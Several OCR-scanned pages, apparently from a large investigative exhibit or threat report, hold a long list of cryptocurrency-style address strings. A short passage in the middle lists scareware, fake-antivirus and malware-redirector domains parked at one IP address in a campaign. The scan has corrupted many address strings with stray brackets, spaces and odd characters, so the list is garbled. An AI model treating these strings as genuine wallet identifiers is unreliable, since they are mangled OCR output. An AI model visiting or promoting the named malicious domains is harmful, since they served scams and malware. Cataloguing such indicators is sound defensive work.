INd29vwuQ4uXy1pLaQzjPoucmiFCXrRZMm 
1Nd33SqZ1FipUtgKLjBx5XAP1InBVguxNcN 
IND30AjPADDWUH7qLeCkg4RKm564Hy1QBY 
1INd6vzYF5JLepqghHHrogbNMRsx5YV4p7A 
IND82Q4nDuuuyZUkVjCKxekyY7iPpSZ5tTf 
INd9c5TGf2dVTUks4gTu7Svz5LgvAzGTtA 
LIND9YoiIFQG3wPnYTBUHKWEC38DYycqvQoy 
INdCBCXNVh9XTyAPeuv3gPeDKp4nRFsWF1 
LINdCpYVEUSgKai6gyCXDupJqSfgieSbKmK 
INdDTrPMhDLViRhaitU92K3StR5JtSSjJU 
INdFXZzkzLsSQCDMZ18uSLQvSmjyQBcnk6R 
INDh3D5P5JeZuK6eAHRquhcZgYRaoirkjJn 
INdHUspk1lvfx5uNhdrxCtQbDjhwZtMTJZt 
LNdMPp7TcNaYfoGQtSRGELG4uPvGKYjoxN 
INdmy2YLiWfL3XJcS2tgQVejyM7EALtXQE 
Indop3fzoYfmKN1iQQuCh3uFdESUFqKjd 
LINdSAxw1MX9rGBcYQeSXMqCHxZeCo5dU9U 
INdSHJfBmMZN99M7VLFANQsQp1lyE5m5U7GG 
INdSKuVSQ37tL4DzXGoreCrRAYrLQDC93} 
LINDStkokJ9EL7P8SV2HUv6qzLZw8vdEZPv 
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INDttTmx7UT2HfFeeabKoZaUNY5CKXysn8 
LINDUGMhmV6qZbci9ZE2yLM3HfxZbWVq7nV 
LINdWBAghCsfksFqCa8Mk21mrkH95LpuFYi 
LINDwqpCgQAi9Gv1DDAtQSBke7SbLmBuXwF 
LNDyhkkfHA3s6ckjQUSQ9MCmcTPMV4Xdbq 
INDZpMWesEmkxmVLr8ZZTe1GrYwVs7ATXR 
INdZx6t8woWsx9gYLz4BP9fxemw/7XP4PTf 
1Ne1flibF4BgfytbJDQCRIwmMSg1XBPFZ6 
1Ne1XKEi2yk4fkqYDxPHFRzh6DyQtpB3j9 
LNE2bejf5GT2cqoJbcp1rJhtz9ncWAcLd3 
LNe2UoLYvexFEjzeo28EVkKft9x2i16GN6R 
LNE3wvBfKne9wfgtCoFUWSYRwx|Lhtfhgnv 
1Ne9SFUL6zV86Emajb9AEE8uBTmMMkk7MmS 
LNE9szjw4v9hNoEogApAWcmw52GmmaoMjd 
LNEBk1D41Q3LMeHGLWUAnFynRkCWP9EexE 
LNEc9b7C1cYXXHJgpVNfzJFPrYGhDWzFn7 
1NedB41Aft145gzg3hFNymA87rEmBcyQAR 
1NeDehSDy7ACGUw1RzcRGYPfri29TT TyhT 
1NEehsUcB3e5gzXNngjYtpgBEKZDLdm1wR 
LNEFLF5Zpeyd7CH8yzFd9jQPspVJY4E6vs 
LNEgxsitmSW3Spyv9GRGZZgvRYGU840Bzb 
LNeiNq9hZxAS75HMfzYFzxnYDpSGVEPDuY 
1NeiXm1JTvvHto6UkmuR]XG6qdwCH6xa8H 
1Nekie6mgqLRcdSWmApjzTzvs4sTn3gksgf 
LNEkqoKaJB98ZidfDM5UvX81kabcY5RQVX 
LNeKY58tuNxvQDpfsxXNMxXcEGLQf8uvjJAC 
1NeLeUtPtdP9JVGPlybqfauphitbfXSZHN 
LNENMRwBVHJ6vQMEb1238LDW3ZLCgx3Tj8 
1LNeoSy7yJozwpdiZ6crrVY4SCy2jG8H97w 
LNEpHbaqfbPYMJJQRidmeUu3r]XbCL7NMhz 
LNEgJePYW2PxBEqZLA83e7nQxph8Qn7XNS 
1NerRTXHL6ARuU5LJIZI5MGyWQy7A9nCwYTW 
LNeRwWC5BcKjU53jjNiLJxwJGVNxQueUZFU 
LNeTvKfmVvHRCbaBxLrsikMErSuHewQXPS 
1Neu2xBA4y 7ftdFJTjXBkbnkKntbaiSmF Xf 
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1NeWgdDPncP9ppZ93TIQdbGYPTZMkdaLf2 
INEX6iY3cQygxWWsjR8gUtpw3tyoRPVulu 
1nEXPf3LAVmM9LGSCI66gHNsbZrukzvRN6 
1NeXqutsjiQgiTg832clJyfkvuwtpEZGqE 
LNeZdiTWNXmEwhnXW5jpvrXMJKVy1NK5W1 
1NeZL7k8xdsMDsnMoS9Q2CQfGgumnfmp25 
INf2XdySTDdKK8PNrq2mpmPgk6nnTpzash 
LNf4SU7XgCjB2NkvTiH96hhscust8pxXqcp 
LINF4Vr2xfKkq6ZWjMdcvhF 3kkwsPF5fYZ6i 

INF 7x6TKpvphWjUSE72s9SbU7hfQXRAYR6 
LNf9qZ72tMMur9GsS389j4W3thkQsaHYYx 
INfaRDPfGd3LzZMn2AvWdDdpi8P2PibqEH 
INFAY4TA8SPNmMsjEuYcTjAJnT2JsnMCww 
INFcq7RnBGLo83RMGXfgu9sjzycoBKMpyR 
LNffaF9P5ZQDBcgxXgtdgVIwCtQ9b7GDYA 
INFfT90SCHW4QaomcjRYE1KmKPoh3v1xPt 
LNFgNPSRZ2iuWRk2HhtmRYWndBQGrphPCG 
INFgwq40CG6tQP8Q1zxWxMZ28UUGKqG4wA 
INFLNsEJzp1EcGamjuH4J53Mf39Y2XUjvy 
LNfoYhPkheJvz38JrcgUpMA6p4LJjWBuHn 
LINFp2pn2S4jHQksrDDWMSeULDVspYg1ZcF 
INF pDKLg3Tugw6896kn8xYWHRuJG9zZWu53 
INFpL4hT8JtvQndu5Q6k5XPHr4wB8ur1Lo 
INFQ6kK4M1N1c3a82R4ZB9QKZ765BgtgUQM 
INFR6EAYA911r3PRyYGdLCBZD3Q6x2YTbBi 
LINFRbggkxmVqNyXbduAoVWG74CY4k2ydss 
INfshMCoLmEVavtp2bcfxmnzEDXLqGha7P 
INfsReB7YTKZVWsDtkg55FnmLYv1Siayn 
LINFTUHNqj6M1cvM3W8fvFAHXDr27qBYQrB 
LNFTV4fxoCx6kBvhgp5ezpw9hwK37uL1Ld 
INfukK2c8LWWDveYBCkFNDmNaGnmMeVHmwt 
LINfywDYqngdpMHsfZeFcahSpjzyYrtccSQj 
INfZXiac4ZCpc7YHydWwpSLrxXkQeNZy7RS 
1NG18sHUmcB1kFd7EdmhUs2SjCX2iCd5Ao 
1Ng37dm1uGgfxMDoGtUUbmé6thTmnypS2sC 
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1Ng3ZaaFn7GwNisLhSynpoGnMMBvyaisLS 
ING4CebCcHfnmBnjgoYgK2qcsnsY5HaMt1 
ING7NnbeT79YVGjzuixw28gJ2ADbWhHk8K 
1NG7q6KehshKq2p6tXsYikWN7UJbUIJfQ7 
1ng813sjWruyEsDSaGj9SGr3C3qFaqvij3 
1INg8L8ecrainl1U7oPWperWLa94qkJghUGG 
INg8wHu47wGfSU5ipHuDjFsyxcCoWjvtWw 
INgd8V2gyLiNi42q8Dhuy7mMRKBRCBYq54j 
1INgDngJozczccBnQdam3aZ7G75vcM6kw6d 
INGGgSv3J88inUam1DNoP6S8CNZKU19y4g 
INGGxpYazhMD4QDuRnT2sWxLi6h44Z7HJE 
INGh73mYCSBFh3McEGza5V3AUKyAsh27S] 
LINgkV1UipUkTtpcKkekFPH6wDeNLXGkxQx 
LNgo4ijQ8CewNtCgYn9vgbjVJKVrK9kA7fF 
INgPjYfq3etCKTAdZtSPi2YFwPji9VYytU 
INGPm6dPSqcX3vt9j53ZdE52yPhsNpnbPz 
INGqJ6kgEGgtSAcRtAgSm8ykTVAo19idyg 
INgqRKW7Do9mxXj67PUviz4r5pcdBMyDv7g 
LNGqRyfS3kwiRzVLXcY93G1Sy7HyQJeuSS 
LINGRYpPfBLSFq8UEYwkSHoukayZT9WoGNu 
1NgS36BPyMn7kWgFAvdpxbQE1tVjT3hrA 
INGtELaueuHRgmYCJADLLnfXM8EYEt29B1 
LINGTUR5F4xos8DjJafWp27c126M8yY3Vsfz 
INgvGnG515hxQKE2Db4y3qNWkcpSJuStxo 
LNgwNwnY2RUPqKvxXP4Yqmpnink18CYzAz4 
INgwScSmZWUW gVVY9F3mu5es4sh25YCzSs 
INgZGwN72tYQ5G5K9XJFJEyi3igPML3ojs 
INh1QoLduU48pjgAi5x39AaVwFt]JSbF3QR 
INH1ZM55RkSEMMQGG2YnAJAsS2E8f4qgUns 
LINh2JQ3U7v5b8aKUgBxoQCSiEL61dicrD 
L1NH3zxFe8rg1CN2YSH5ESNxYjqP8jAGVhb 
LNh4fVjNZhH5LF11TgyMyZxA35snXTpGRnN 
INH4KzPXs2LRfD65bzsmgRnMvZFGrnXxXing 
LNH5RbQqxBuqdEieTH65tV4CvXN8nxMABE 
LNH6PN4ExdZiYdav8uvzpxtbZcZY3d1yAi 
25722 


THEWS OVEFWERIENEE CO 


cbamanewtenee com 


cobeythenvercom 


primeareanetworks com 


Parked at 193.169.12.70 are also more scareware domains/payment gateways/malware 
redirectors used in the campaign: 


colonizemoon2010 .com 
blastertroops2011 .com 
virscan-onlinel .com 
virscan-livel .com 


antivirus-promo-scan1 .com 
valueantivirusshop1 .com 
megaspywarescan2 .com 
worldbestonlinescanner2 .com 


hqvirusscanner2 .com 


warningmalwarealert2 .com 
antivirus-promo-scanner3 .com 


bewareofvirusattacks3 . 


com 
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INh6U6uCUO0DEbPXdhyKt2dV5vRAddpD793 
INh8vHeZoZdpKAYqgtoYJBQsKWDxJLgrcj 
INHayeA7L59QJFEM2XVWu4GSix6mt1v19p 
INhBrS1v5tTxsbEFsgS5MHCxL6VG3LG8JmH 
INHcBd7FaHwWTR6kKPDGzZvpHbNXMQs4WbAX 
INhctTViEws69yakYmnEHogLEFNij4R85m 
INhdfXUWPdvfebKFFgKwptwaPkUSQ1GtqL 
INhEp7i4StNER7Af2iCyQUfXSvquf7tsfo 
INHeRp4uR1LM3CNnrhQguiJ1HT9ZTXtLk6K 
INHgHGYm2f5Acu4XC17EKoMLDAHC5143G8 
INHL61wdxzbZUhEfqhcn65S1ppofHlyk5S 
LNHnrWizhB3DjUeSWG6Dk12m4rBhlvr7Nf 
INHo6KiG3hA98vK5SzZ68ZCGuZQJZF881Pi 
INHr1Z34bCUk1La9L47mUnhLQ2fdLp7fmK 
LINHTngGJ719DxxvGUibxrTp1TGdsQSoFA4 
1INHusjeZwC8goCs8fdMCE6fXxRgQCMBQzW5 
INhv4GhZhNHDoftu6G4ycymgq4i8ZPC6jV4 
LINHwAtHray5LUyqzcBCCGSMeof9hfeex5A 
LNhwfrtXiLTxA6GUc1jbtshzvMVLmPto1G 
INhyP78eyK5HpBRUm8wwqexxYMP6BzBoRa 
LNi2d6ntLrza9646HmdSgymseAibe8o0yKG 
LNiS5lmFq9YJLvixXJ4NK88basSirwBq5ser3 
INiAEELZRBxWPXjMNAGrPZA3HTdQVefZHh 
LNic2wnDWeuDhKhy7zArxSET4eu7LGJDRQ 
LNif4uHFCDzho7xjP9rQkF2faq9zZExYAKZ 
1INig44UJ54543e75HcZNBXRZwTd6bn2mkK 
LNiGboX8yEwYS9uTC6k7ZYBsfWKB74KBsc 
LNiHeP8P9QMQ6VE3tHEx7TRalNv6u13ZUP 
LNiPp7xMAT5jUFGQ37xhfnY2zp2QwnoHKH 
LNiYJZ1xgcdXpkzbAfkitcdA5Um6aQPXVr 
LNiIZDRSZMNoCcWbL2MoTzTBZgp/7Tzsklvo 
1LNizs6ZEmzo2cUNW6L3ithDznMJsS5ovbRS 
LNJ2qSBJNDyReB6vVfMWTgQ4rWZQ3sASRo 
LNj5PvZUdfPLeo2MuBRAsJ1K32iJftasV8 
INj68m3CESCrryAXpnpJybDKvxH1YB4bbR 


25723 


LNj6jyKHvDtQNZkWhtojhq69uPBa7hTFEo 
LNj6pkXLWgyV3mkJoQFXQCleaLQPS8QqexX 
LNJ88MhBJNydxada4EgYqshGE2pCADBK2C 
LINj96H7KDdChmTzRYXKypCdRbRhdS25YT7 
LNjajJ6Txdrny2xZPUMEDAUILNHUBkoFn9D 
LNJATtKUaTfssdQ9DqghBDnw7hAxTjJAGWpN 
LNJbcRZBAEC9DN324TpbtMpKkzzhjbs4ijJ 
LINJDDnaL6YKAipT5QXx8TLLoFg6sLMcWdG 
LINJdo60Cs4lem2rEMTc5KLopBaoZrtm4jv 
LNJFADUREb7ApCM8NABvsDzxuRA4nCA9yM 
LNjfdxdLxMz52u5Ni3MH9gStCNsTPCXF5U 
LNJFRVKBPhh3EeR9OR4vcjFkK4WFMGijjtL2 
LNJGrpvdWiJ14Xc35eZMX5QCRR4Bbob266 
LINjgwCXVDXuSgzHy6Aqqp2LPLY82Dmbczh 
LNJiEM81LMa8xkzDTmBjyDgTQndc4U8AaM 
LINJJNYXQ9YXKp1WY]JtRpYttLqR8eSTswgw 
LNjJM6QnsUfGuxpdZ8CG9IGQxqy3EFfNRoy 
LINJkguM7gtkUZJyb6VVp8Yds11YZX7XA3S 
INJksuVcELHuU4QXEdt2LvdmxCXuhSs5rkt 
LNJoKUmz31dfn8FhaHzC4P9u5ccZTAzAfy 
LNjpNeiYsLywnM3UMFp1DJxmNWHACNS5NrU 
LINjJRCMMxePvuYc3EbatkYb4Y8wa86dRmvW 
1NJrd5aRyuZLisnpvgRSVas6n5QkWeHkhH 
LNJSbeWpXb9EpndcirnGHpKFfBDyLcwg1Q 
LNJTWuJoJCLEJ1rH3yfBtmaCRrQPCMUpao 
LNjviBzZDpKGWs8kdhagqs1LxsVyBAret1Us 
LNJwnDT2Qr4aATjT2t2SHGzlaJKeuvX68B 
LNjxVQHJ2qKHEyAC2hSz7DReAtDKNJagAt 
1Nk1Uxj3LwoKsG81KFHA6czYY5ubRcvvaH 
INk44yyCzPqgWHQgW48QnvnbCHq2sjsM3L 
INk7UgYe9daYgHQVvb4sDxJmhy6h6arcxb 
INKagcb9sTYQQUkaaVoYYFTRkcF5S7DXwT 
INKdAbzQZDgKKxMaPScH4NgeGaFdWEgjeS 
INkDGuHLHWkKjdsJCZ2NDtG6sbVm4i4DNk1 
INKgqEkQ64vjJASc2RLTBbKHdjPyNDP17 
25724 


INkhCWuZLkssyHDTMqdYC47KKVgakbilyn 
INKKVg5G2GquupiixLQFmZxmXGjz8vmHJM 
INkLWuhqKRLSDDBPMo]JHkeqVsp1tgUY1Fn 
INkKM9WnswhSRTkQQtD2bE]JBobnykhTifv1 
INkogE7bsep1KYHNBqVej4qrrFw9egWpvn 
INKPpWcTj159ym3Pgfip9P1VDb2SXcXWwfXx 
INKRutTFWajY¥3qVjqqqg5NMRxsu3LymnAp 
INKS7FjVVNFee7WXscA3gcKLarH5puP]JfY 
INkuauAEHQkmq34kw8MNpD5GyrrM1MHRvm 
1INkues7RDNEjCWmeepVf1i45dM5u2uiNPy 
LINkuVyeZ3rhF7Y8nQHCSgn56EPsKWDRadD} 


INKWWvSXU3TRmqumuTNq2eKPDReW3vVBBz 


INkXbJhkb6any5KSN9jhaEw75xpxo4FM5C 
INkXgvGDfHHoGrerCPjhYoThvGNH8BLrw6 
INkxQKT6qxDrMPdNWhRM4]bzZJ488cHa34 
INkXUSc1Wdd88akwW1GaooHiivecov8aC6 
INkYyr2Ha3dgph1JKxS4Kx6GeuY7B7m1uq 
INkZQhd7WFwYyQNe5NT3m384rFQVT5RMFx 
INL1IMn3yhe7sHu9AFb1B3gxxAlaoxRCZpY 
INL3JVG9uzqwEdZayjH9Y5ngSGCSP1sky6 
INL4xPn8pGGvYqiGlyuQkXegsfmoldnAEX 
LINLAxrxeTUtWe5mU8Gnvng9RFSqtLfRQ2W 
INLGWvLyLhqZNy99fG7zcELg3YgFfhqDs9 
LNLINnRip3zKy9TKfd4 7uuGRJCWNNAJ9ZH 
INLmiMJ9Dz92wBZWCvQsRm9UKuYg69vqTD 
LNLnjToiddAe6K4Yck3t7ejEH509JdhdZKk 
LNLPmpnFWLrFjyTcLZJVyVVCRkbfxsm47s 
INLSMGbr1lkZyk3yEctTi7nJ4ZezY8ABxGX 
LNLth3xixyfKBXX4ejSg7wSz23ZnBQy7k5 
INLTYTXMQdfX2BNE6fZZPn1FtEegNkjpwS 
INLv4Dah4kamtTDxSGp7cGUxtTAJ3HtDkx 
LINLVZkXoAkVJnXgNexmAWxSCkhB409ncDZ 
INM18U5nCe2vs}J7KirNjyLi3QoiiHhtc9k 
INM1fNJRY9A5J1KXhi46gtzKW6KyQ253S;j 
1Nm261q1vuRoz3o0ranEmTutusdHsEFgfSv 


25725 


INm2GMkZSZduEDUuU982UZQM2yuNnJMeaqT 
INM2kua9dmetcQboAJKNoPLpjT5vGfhNZk 
INM3FAieZzZDGh7Lc7NA51JkjK6AeGU2zZY 
INm4ELYRoLStWyo2D6NXTm8DE2dJHqN5B9 
INM6jk23LYZ15tQ3kPmMMuNCxMgyL59DdMb 
LNm9uDTps87VkMvZvCbhHoZwfEiExKu6érn 
INmaX24r5K3dVs9sZzNbyvdtvimVwxW2tg 
INMc5L6BkKHQjhrMe97HxFrEa6z5znjcNnW 
LINmDnGWpGysUaKRYC7QWqwyYPjuNsGNa6wx 
LNMDVz6qKHg1zUx6u7BivPLJ4HS2Q7bhWD 
1INmeGZJ9JgWYD1fk2KPaxLisgnyhPk7Gg8 
LINmGg2SxREd57vJs7CKMSqn5kAkFAVzvnK 
1INmGreWpNLmESCFH]Jc4efTN66g4ARh7f9N 
LNmHjnJAzezEaPeT /baHfaa8Jksk2X9KJE 
LNMiiPNGb93VwTXGrJY8FPvnLng2ZSdct1 
INMjC1G69aUQuztG523rpdZMLzYdS1RfC2 
INMJJRpogE2M2hzf7chBEkcX5gJ1Fpremz 
INmk9aAG3u5KhvHoMr1fRtLAoXbe3FDerD 
INmMMG62e5kgFuXNxiJptohe9EY48BWRNw3 
INmNcXnSFhgVkWKcDm69nqkKQnwU6écdajy1 
LNmnkzfqEtaLCSjVAH3sc2cXgAREz21dk1 
LNMP9y7MnfkktQJEqCpbZYdMs3UMPtG1sa 
INmpL7Uya829hTYNsbUoViIDC4h7VJVN2PH 
LNMpV6N2wPtcBG3A5J1DiSJ29ipjpFiZXP 
INMsPDDZhnZM3UHjFcc8fAp5EFm3NUq3G8 
LNmTETugypfug8Rjfr5kBxEoPVNSPQmqb8 
INmV7aQVux8XqEd6MzycgNtcviGMQTbHpi 
INMVXwfpZpvG8DECiv1KjFKvuUzVLS8FQ2 
LNmwr4Zz66QsYxALCZ7Qi44w6hjJevBpqbd 
INMX6s9dgNXZpBsWWVYC3ASrefeulh6jSg 
INmXa9Lz26Q8UzSRPwbtpP5vzBe27LAZUn 
INMxGZ2V12gu9CLCbDrwxb4Ne2dA4wWS7P 
INN3uDgZx4CisEhgX9Mq5GKNFCJw9YCptm 
LNn7ktJjvl LHrnG7kK9UUpmubEYPJGZ8MoZ 
1NnB7veJDdfbbp8GCMEmQt8axwRu3af42d 
25726 


INNbwXnoXKA9sWwJUpSHzymJEGSVruDxVR 
INNc7q9xNiky9aJGkYaoHwwfYK2kJZi124 
INnCAe8NRR1wW4Xtibzj5drbMF16sbHodEY 
LINNCufPjJNFleu5CEZ9aWjuEpLbR32bAQYc 
LINneGZGmn3HR6h3gQaY6Ab5p5WCUyTFTRp 
LINNEoO5F9FVKAoP293nqbkwazyTUiVp3gt} 
INNF4XfjymVaxXh1pppEzNBa6étFscp4ZM4u 
INnfyho5UBef8vs2qteLLi4VobSF3BVe4X 
INnG1SQK1lyZg4ApVgdhUEgDNnS7AAr4NDa 
LNNgNDJUrkdvuEfNrjikKZMpgig8Z1EULUX 
LNni8knvB7sgMAqWiRvr3CHnPC2YxP212y 
LNnLf4AJ91tJayvwBBZgSFo3zcPnroRCHM 
1NnLgrjPFbw3eKh55UECUfs480nFLAMBDo 
LINNn5Ybnk9DCiJR5ypVdrvf7WVxcqFWCc2 
LNnnXo0ZzAX19rJsAiikBAWbuPoPdxXAvgfa 
INnPGHiaD3T9LPpy3FmdeRV9anFLtNwUk 
LNnuTG11SDS5zTZAUvS7Ji4Qh11trM3wjE 
INNWMRaBv9SxKeSakyXGJkDtkK6otnxCTbd 
INNwtfvH1R7ZeQwKEj9ZirKWNanyvvpQgK 
1NnXsB6wncaUBwme}JaYqqSmG]3MByCdkB 
INnyD3HD7D84XqdxAc37dMLaqfkpt6iwsZ 
LINnypomfMZHzvwJP1LX42n6USGc7eEo9SL 
INnz4ZNNEM9p7FhBfu3kaLVBrKMAWUBfbA 
LNo4J68M3vm2tASCB8Wd83aJPYyLtf1Ypn 
1No5xAHb3WZEMCAhanjak6hTGLk3h3JJ3L 
1No768KAziWfSE73XNztxyGvUiS3Uyfb] 7 
LNoahJwEB61dMkxQNGLarikaC3AzSvGhYN 
LNoB4f382Eyrm4wgo2HjtjoNnlHaeWiPDs 
LINoBNcV2EPhyrDLLAXDQvze6TLCReefa6a 
INoE92Ek71KSHdgGaGqYlvew4hcK5kUoan 
1LNoFzJJoR26YtovovBfvakfkt4fg9egEuC 
LNoGP7ZL3Pt2GLD9DvSe7xTBHbZP6rdzDy 
LNojw8bSPDYnatMA7aawagL3hij1Cw8pGiC 
LNoJwbdPo4iVxcSTDmhXS4ULDQYBBH1EYX 
LNomRCgWgoWHKWRECGN3WHONAa8C36Qodiv 
25727 


1LNoQ3dzLCayHerla4uXkBAyjLSRDZJfSTR 
LNoSJTNpFc9hAEEtgZAnWCXbUzfbxRrWP6 
1NoSVCwGsveSUHPbovpXK3UZgsaVzsskzX 
LNovnbeYizd4JnZNkKMCXSByuhcFs7yWBAL 
LNoxUMRnYYHPcsSg3xK6EMWZE8pHSYJiWL 
LNoz9YrZdrk2B2kF5d5clirtQcbFS8T9LG 
LINP2GzyMpnbzFdHYp7UvVcYnveKKH2MDhZ 
INp5yzRXgD2ZbNCVnf86TZERAxs9TFNKSU 
LNP6G8Ahdazx9vjeA6UyZxDcWTQUkji2yM 
LNp6Uvno97zqw62CNxqsrQi3M6PxuLJFft 
LNP7xmL5UciS8eFOFWFHJgMuhchsC] 7AyY 
LNp8jaEnLb6nJJ8nD7kR9gLEc6Rs5cufpo 
LNPAnR55UVRST8x0eQGpWMfas9JgoJQ9jQ 
LNPBpHSbQNrUtTBhN14dya4x8aejqGk8gs 
INPcw35D5n6QFmmQ9bFYgWNCNsmW7Tms5w 
INPDitbZ8d7u2sLhncNEfA854dvCwycESh 
LNpDPxbYqyBFH7Tphg9vqc6RYBRAHXRIfN 
INpe4KA5qPNdKQnGn26tyu5DsZzNg48vn4 
INpe88qDXuMsT7jUR18mMBHgwHfoS2CUSyo 
LNpeeQpiBM3b8CoxjR1G1tUX7ikoJABkU2 
LINpFiIGZNXiZ6Vea87aEbKD95vDpfGchssm 
LINPFwyDNWGWfVaswYTjiDxP9W7RxRkKAktM 
LNPfyVMfF8MkC3XRiPmM45wjDoyoQW2KatY 
LNpHxlogtubJQ7ER8QrqADqYrWRTbL7NsU 
LNpiVeGXMJy1VDxNc58k94KfJeig5QEbNp 
LNPnEvXcMT2F17t9xBiZHt8yKG8f7xUhgx 
LNPPEWx78H2Qp97hsZXXKNXQYK7boY/Lsk 
LNPq9FhSRrYwdC7Ze5sr6C2yAcC1inPBY9p 
LNPqptRx484Ntyt8SuZRPKVsekJHeYjTme 
LINptUF6xDD5VCiAcnTMyAaqcev8gRrB4op 
LNPu5RpiiXMZXLfaag3fjdvR8yd1QcdmkB 
LNpUrSxCBnWVVkUipHXBUEUxgA25zvWmK3 
LNPVicferKjgbjuFAA9twEqHRdeVTyyKqT 
LNpvmiFUwyKJo8WvQf18PgJt55rNHRuz5w 
LNpwuJaDzsDWobUVW4DDkV1Bnt4Lesm1rw 
25728 


INpYeLKGs1JBSLkxteL5EJDjxXmnYuoheu 
INPz44dqSKxV56BQmV79ho5iNWdLcjoGMA 
INq3X5Vm9PgfbckUjqXFNk8mmZiJQMCRsy 
LINq4W8hPWMN1Kq1lyVfNR79dwTQelH8pjFW 
INq6H2kb95nAFZ70H8BNRM9nen11VG59tpa 
INq78G5ZL24xLvSEkTX7nzFFTNw271SY5z 
INQ7N5PJupan46u8eA83jhA7eihk4LNNsT 
INQbbDsKHhTMmYwHXcLWi9SCkS6CvMhakrD 
INqBrG5Eot35GGR/7JA99JTFBA8PY8S4z2Wy 
INQbYZnCzCmpjZJEeBdYAgXivkRrogpvoD 
INQEsiMZeptSXofptQkeXH5kqEYv1q209i 
INqEtueL3y2W7rurfT3fgGVGeoqSYusGvD 
INqgKaqFwHvo8J9m8kj9D4YA8nqLgr4ip8 
LINqGoXPH4VdrYcYZzVQ5qMygGbvPubpHNs 
LINQHcLIGUUL7ugKYfEyNvJZvG9GZU3VsHv 
LINQiPeeogPF5wanJMGX4u2m97ALy9EpYEr 
INqJUpUKjBknb7B8UTMgJBQH]7mLfPSRer 
INQKFCyhPsRdJ9KMgTzhaEWcSNGtHuSxXU 
INQLD7CQVaQQKaQ5Y37SUekWUK5quFLYuH 
INqM2if5mEunWc9S1vrfdc6Ku8icKM9eKp 
INQMFFg5TJydsp3LnLgtSC239xmGpaTsxC 
INQMqs13mrEKrPJcbH5tVQqYUrsrAriroE 
INqMxjqqmm41laqXady7RqBPgHGC49Pozw8 
INQn3qkEhmaZh3UDsjUR9qdCXA4R6Z15KU 
INQN9d54kV5yNTVzPgQ5XSw6ZntxhU8ce6 
INqpiaBTGS496o0b6tj9ft6fsoMQvveczqe 
INQQ1cBN1Hkdv9EPXXzZQ5QXqU3yYfGGJC4 
1Nqq1xDLRRBLMBMpBidpx6qpuMh7dwB4zz 
INqq5zfdiUqkF87yYxDoenExiNwGVnqWPa 
INqRMaFBUQsy]JGaocd3xRaDLaN6pExMLY 
INQrZ7DXD5JyH5tzyASjkgcAnwV1WQYWY} 
INQsRQ4zDzCpgkKb5toUDUU2H8ZwQGT qWwXF 
INgqTxxmGw4Yma8sg6enVetUSzn5ijfrjJsTY9d 
LINQuMs8yM2dG37tiDnjtaEjceA5ggq7w7x 
LINQUo1pLWmaDH3TDLyQ61da4RB32sWaynr 


25729 


INQWsCWe4gisHEfGiYCVJMT5CuAFaxRL1J 
LINQx6CmTU5FjJWoUZRxKgwvCc2yVYqmk9tR 
INqxbDkC3Si1Ax9jzf4etcwJLZQ7NtZ8Si 
INQZdZbP2PodX4onDwP4DHDcMft6WhSGUt 
INqZQuhePVtkVNadRdpmP4WiJu992VRF4V 
1Nr15JPKspximxAoyWXUgekLa1GdrHdYx6 
INR1jZXcqYThphD9rPepUbKK5JhdRcP2zn 
1Nr9e6bwjcByeZHyFrhdKdSC2Eikx8jqJN 
LINR9gRT3Fr2kw1P5fdSxAV7wNiLGUTT1Gv 
INrcDJy8RUpZYtP32WRg1vWaasXRPcpZEj 
LNrd9HqixF7hWVCa96xD4jbvpf3n1GHGXxy 
LNRdoobdésyjJy6PJDhkGp9BtpbxEmk3iepy 
INReK8XSHvJmZdHgzSo6jjJQ7t3bw3QcWH 
LINRFaYtSrdYKWzVmVfKKGpiueKNMxVbNvS 
INRFkj4rn3dMXNuxEtisN54d2A2PdJWCw7 
LNRFqtWguXZYCHQxvx5GWSsHLdfBTDncVyP 
INRh7rSCAXHC6aVLGqHnnp4TqAWKij6Vs5 
LINRhgRtNKdEN97dusoNBQVceF4DQiaMKSb 
LNrhRzCYrUvtUX83Wgwnh2bzwRd5V5tcSH 
1INrj4LSTPeY9ADnaF9Rf6p13MfsnLQ7ndB 
LNrj8tM4kdLVV1PCQfxXdizRMhKPthcAWM6 
LNRnC7FVhi2yzpHbNYm9taj 7shRdWFrj7C 
1NRoaTsrG5MmubG6dd4m4MZvSkrWY8eJN9 
LNRRs9thjxhJ1S2vaskSLGSGwoQJY5W2z25 
INrrxSYQ2RvVvk1SD21YorbYvZwZsqiWQZ 
LNRuZfVjkXovp8FYwkfqDe6HxneQJ3d7RN 
LNrwzcCoLoJfU2BTP64fyyy 7XN6AVRf9PA 
INRX91G6TH9VTqdtPoebwZZBrZT6YpCSHh 
LINRy3ESWNqu2EZFt6JT6iJg 7DU3NHhWvBQ 
INRyRpRNtkM3WuXZvKS2a78bnS3jTzfTTg 
LNRZMmNBPmrHp9cC7pQq3FLZcPLET2FmqD 
1Ns3BieDSx55R6p68UAWQjndu6MdvsYuaF 
LINS4joLXTEtixLWz1SrQSiEjfvToWSsJ3w 
LNs5RPANrkX67SN2V6xUQUIna4Msyyj2yQ 
1NS670RU9d1jH7kCJgZK19ex2r6ExKPQ8H 
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INs6DqHVYrmc]pvG1lgyNMN7MxsnU1CTuxi 
INs8QniLiq6pEi9q)/KdrW8mNMsK13xAr3N 
1Nsa5quhysfekxQ8uGbVRIE3WHbFyagw8y 
LINSakEzm2xcnfYkjuy6VPjyQKnqCKznb5k 
INSbRMkjH4WdKBSF7r9tMQLBWEb11ZAs2K 
INsc4j5rm92uXf] 7K2cEWJxNsQLIMVEn9g 
INsC7Nf5XaVikLuKp78dVZTLBTEwUsLrwp 
1INSCFRvq66X8CQ2pxopweM4xPXutXFLo54 
InScVtVX3XMV4WHaj8upwdZfV8uVva2Sr3 
LNSdALIQEVhfcjDMpB1jV8YUDNE8mJtLuh 
INSGAChqFMxTbZhT5zBCDcYU32YSNg9FyT 
LNSGJHacTnADL2hg3JKztUw5VgtQBjifEu 
InShcWyZrgiQVu9sE5wZEPpt6AyQuc7MN 
LNSkyroiHt5saQ5zqgR5r2duNZ2VHkafT3 
1NsmrqtoKoc5DMDDbPSt5nwrSPiofNePhX 
INSmZjiWxnaNiRKLGo3c2unRR44KifLiLp 
LINSpA7gmxjNRH6M4UD9eBP1ZqzoFnBkKhjs 
1INsPVB35M8svsm3E2JaitDVcrHW1Zflvgr 
LINSqMqoKbUSnLmxiF1SnQVCUUXKH6GQGNE 
INsrh7pZpzlueSQWdRm/7JHnw3Trkv79eZa 
LNsSunGp]5ajXmjn89CBM9n2BSMgepQLuU 
1NstD1JsDns8yGRUqM1mWUdqFsg7B78v3Wg 
LINStEoDcPM14UUiSMFe1Qb89CZt8SaxEU9 
InsTPUhH1INZQz2ruVaq2YkUaruwHN9JHHq 
LNsuhXiQqb4HNxVch1D7k8BoApDKzfM7CQ 
